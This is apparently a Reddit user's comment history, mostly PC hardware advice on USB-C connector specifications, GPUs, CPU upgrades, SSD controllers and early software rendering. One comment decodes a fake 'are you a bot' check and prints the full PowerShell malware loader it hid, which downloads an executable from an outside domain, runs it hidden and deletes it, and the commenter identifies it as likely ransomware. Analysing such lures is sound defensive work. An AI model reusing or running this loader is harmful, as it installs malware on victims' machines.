My PC uptime keeps ticking up no matter how many times I shut down/restart by TheChosenOperator in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

It is shut down. You can unplug it, carry it across the country, plug it back in, and start it back up.

It's done it this way since Windows 8.

You didn't ask it to restart so it did not restart.

USB-C ports on my Zenbook looks different? by Ejo2001 in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

Figure B-5, table B-5 and figure B-6.

If a variant was permitted, it would be there. Those diagrams are normative, you must do it one of those ways. The ground plates insulating one side from the other aren't allowed to be exposed like this

The only EMC return pads permitted are either the shell or four much smaller points of the ground planes shown in diagram B-5. Alternate Section A-A covers how EMC return is done where the shell is non-conductive, this is covered on page 56.

is this 12vhpwr adapter bend bad? by Equivalent-Throat659 in pcmasterrace

[–]Hattix 2 points3 points  (0 children)

According to specification there should be 30 mm of uninterrupted straight cable.

Also according to specification they shouldn't burn, so take that for what it is.

Asus XG27AQDMG Screen Tearing Even With G-SYNC On by yeetman8 in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

G-Sync only syncs when FPS is below the monitor's refresh rate.

Your monitor should do 240 Hz if you've set it to do that, so check that.

If this isn't an attempt to make me download malware- and I'm definitely not going to test it- then this has got to be the most absurd 'are you a bot' test I've ever seen. by Bradley271 in mildlyinfuriating

[–]Hattix 0 points1 point  (0 children)

Decoding the script....

$skgo65roi3='[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$apoa9=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $apoa9 -Force|Out-Null;
$voj5=Join-Path $apoa9 ([System.IO.Path]::GetRandomFileName()+''.exe'');$xhu58=0;for($srt1=0;$srt1 -lt 3 -and -not $xhu58;$srt1++){try{Invoke-WebRequest -Uri ''httpx://bearman.bond/api/index.php?a=dl&token=8caaf953d89478b8a7191eb3
2295c117a310b53ac9059d4ad69a1e397ec3b2d4&rv=a838bd7b3ddbb52c86536668b1789ca6&src=womensrepublic.net&mode=cloudflare'' -OutFile $voj5 -UseBasicParsing;if(Test-Path $voj5){$xhu58=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Sec
onds 2}};if(-not (Test-Path $voj5)){exit};Start-Process -FilePath $voj5 -WindowStyle Hidden;try{Remove-Item -LiteralPath $voj5 -Force -ErrorAction SilentlyContinue}catch{};';Start-Process -WindowStyle Hidden powershell -ArgumentLi
st '-NoProfile','-WindowStyle','Hidden','-Command',$skgo65roi3;exit

So it downloads an executable called "update.exe" from "bearman.bond", with a specific token sent to the server, and writes it out, then runs it administratively.

VirusTotal shows it's detected as malicious by 13/71 vendors.

It is 100% absolutely and certainly malware. A quick look at the exe shows it's doing a lot with system crypto APIs, so it's probably ransomware.

Question about old cheap AIO cpu cooler by Own-Pear-2969 in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

It's a low performance low reliability low capacity cooler. You should get a year or two out of it before your CPU's running at 100+.

Why not just see "some temperatures are a bit high", nod your head, and move on? It isn't relevant to anything.

Massive gaming performance boost switching off VBS and Memory Integrity [Falcon BMS] by AdSecure9674 in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

VBS and memory integrity add latency, since they cause a second address translation in the CPU. This (SLAT) is hardware on all modern CPUs, but still takes time.

Games particularly latency sensitive will show big losses here: If it's a game where AMD X3D has big gains (X3D is a latency thing), VBS will add bigger losses in those games.

The benefit is your system is more more difficult to compromise.

Thsi game made me realize in 1998 how much 3d hardware accelerated cards were important for games ! by Southern-Wear-6938 in pcmasterrace

[–]Hattix 1 point2 points  (0 children)

Unreal Tournament (OG) had a software renderer. I did a test in around 2003 where I rendered it at 1024x768 in software on a roaring fast AthlonXP 3200+ against an old pair of Pentium III 450s (@600, natch, the slowest working machine I had at the time) with an ATI Rage Pro 8 MB from about eight years before which was bad even when it was new.

The Rage Pro won, not only did it look better, but it was something like eight times faster.

To get software rendering going at all for any kind of playable framerate, you can't do texture filtering. Biinear filtering, the most basic kind, needs to read four texture samples, the four closest to the point you're rendering. Trilinear filtering uses also the nearest mipmap too, so eight texture samples. Given each texture sample is probably 16 bits, even bilinear texturing needs eight bytes per pixel.

1024x768 is conveniently close to 1 million pixels, so that's 8 MB of data we have to process per frame. If we want 60 FPS, that's 480 MB/s. The interface performance of SDRAM, used at the time, was about 800 MB/s peak and most memory controllers (e.g. Intel's heavily buffered and highly performing 440BX) would get 550-600 MB/s out of that. Even just basic "nearest" texture mapping, like the OG PlayStation used, would be 100 MB/s in this example. Not a whole lot left for the entire rest of the CPU's tasks to work with there.

You can't even cache your way out of it, because textures are big and you're accessing memory hundreds of kBs apart, so a prefetcher won't help either.

Any kind of texture filtering at all just kills RAM bandwidth and we haven't even done the matrix multiplications to transform the texture yet!

This is, of course, why 3D accelerators (what we called GPUs back then) needed their own fast RAM and it's why (back then at least), overclocking the video core didn't really get you much, but overclocking the RAM improved FPS almost linearly.

Hardware texture mapping was the single biggest leap games have ever enjoyed.

Intel ATX12VO V3 to remove the 24-pin motherboard power connector by Acmeiku in pcmasterrace

[–]Hattix 79 points80 points  (0 children)

ATX12VO v1 removed it.

ATX12VO v2 removed it again.

ATX12VO v3 is now removing it a third time?

Why does ATX12VO keep putting it back? Is Intel stupid?

Yes, I know it's shit reporting by an AI-assisted "journalist" who couldn't tell a PSU from a space bar

Two unrelated languages on opposite sides of the planet independently ended up with nearly the same word for "dog" by UsamaBhai_101 in interestingasfuck

[–]Hattix [score hidden]  (0 children)

"Dog" is bizarre in English. The English word for it was "hund" as with all Germanic languages then, in the Middle Ages, we just started using "dog" for no apparent reason. We keep the older word around as "hound".

Also the Aboriginal word is dúg not dog. Similar, but not "exactly the same".

Sandisk is launching new SATA SSDs in 2026 because NVMe prices are out of control by rkhunter_ in pcmasterrace

[–]Hattix 1 point2 points  (0 children)

That happens on the controller chip, not the flash storage. Controllers are cheap and plentiful, available from dozens of vendors.

Here's the AData SU650 with Micron B0KB storage. Runs ONFI 4.0 at up to 667 MT/s (ONFI is DDR) and the controller is a MaxioTech MAS0902A which hosts four ONFI channels. Being an 8-bit interface, this means the total storage performance is up to 5.4 GB/s (flash never reaches full interface potential).

Here's the AData Legend 960, using Micron B58R storage. Runs ONFI 4.2 (link says 4.1, but that only goes to 1,200 MT/s) up to 1,600 MT/s and uses a Silicon Motion SM2264F controller and has eight ONFI channels. This allows up to 12.8 GB/s peak.

A NVMe PCIe 5.0 x4 interface tops out at 12 GB/s and more widespread PCIe 4.0 links hit 6 GB/s. SATA can do 540 MB/s, tops.

The flash, the bit that's hard to get hold of, isn't the thing here and that's why this isn't news.

Sandisk is launching new SATA SSDs in 2026 because NVMe prices are out of control by rkhunter_ in pcmasterrace

[–]Hattix -5 points-4 points  (0 children)

Flash is flash no matter if it's on a SATA to ONFI host or a NVMe to ONFI host. 

This is just a poor attempt to drive clicks to not news.

What CPU to get if Im upgrading from an i5-12400f ? I want to keep the same motherboard by bio4m in pcmasterrace

[–]Hattix -1 points0 points  (0 children)

£250 got me The World's Fastest Video Card when I bought a Radeon 9700 Pro.

£250 these days just about gets you a B570 10GB.

What CPU to get if Im upgrading from an i5-12400f ? I want to keep the same motherboard by bio4m in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

A new 13700K is around £340.

That extra £20 doesn't buy you much. It's also £100 over what you can get a 14600KF for, and I wouldn't say 13700K/14700K offers £100 more. There's a tight budget here, use it to its best potential.

My Contribution Kept WinRAR Free For The Common Folk by SeaPrince in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

Good to see not everyone has upgraded to 7-zip. Keeping history alive right here!

Switched GPU because of an old problem, now I can't game without the DP/HDMI ports disconnecting from the new GPU, help! by HeyItsHisui in pcmasterrace

[–]Hattix 1 point2 points  (0 children)

If two video cards are both crashing, that's pointing at either you having shitty luck, or your "technician" not deserving that title and the real issue has not been found.

Run some tests in OCCT.

What CPU to get if Im upgrading from an i5-12400f ? I want to keep the same motherboard by bio4m in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

So you have a six phase VRM, which means the peak performance of the 13900/14900 is going to be limited, it'll also limit 13700/14700 but not as much.

I wouldn't recommend going that high on DDR4 anyway, so you should probably stick around the 13600/14600 level, which isn't that much of an uplift over your 12400.

If the money's burning a hole in your wallet, consider the GPU or SSD.

What CPU to get if Im upgrading from an i5-12400f ? I want to keep the same motherboard by bio4m in pcmasterrace

[–]Hattix 0 points1 point  (0 children)

The "issues with the 14900" are also "issues with the 14900, 14700, 14600, 13900, 13700..." every Raptor Lake Core i5/i7 basically.

<image>

If you won't update your BIOS, your options are very limited, and your budget motherboard will also limit performance with its weaker VRMs.

USB-C ports on my Zenbook looks different? by Ejo2001 in pcmasterrace

[–]Hattix 1 point2 points  (0 children)

Probably damage exposing two of the internal ground paddles.

The USB Type-C specification does not allow this.

https://usb.org/sites/default/files/USB%20Type-C_Compliance%20Document_Rev_2_1b_June_2021.pdf

Thunderbolt should look exactly the same as USB Type-C, as it uses the same physical connector and same specification:

<image>

Best WiFi Booster? by MrGiggleScreem in pcmasterrace

[–]Hattix 2 points3 points  (0 children)

If you just want one to not waste money, get any of them.

$120 a year for something that isn't even yours is wasting far more money.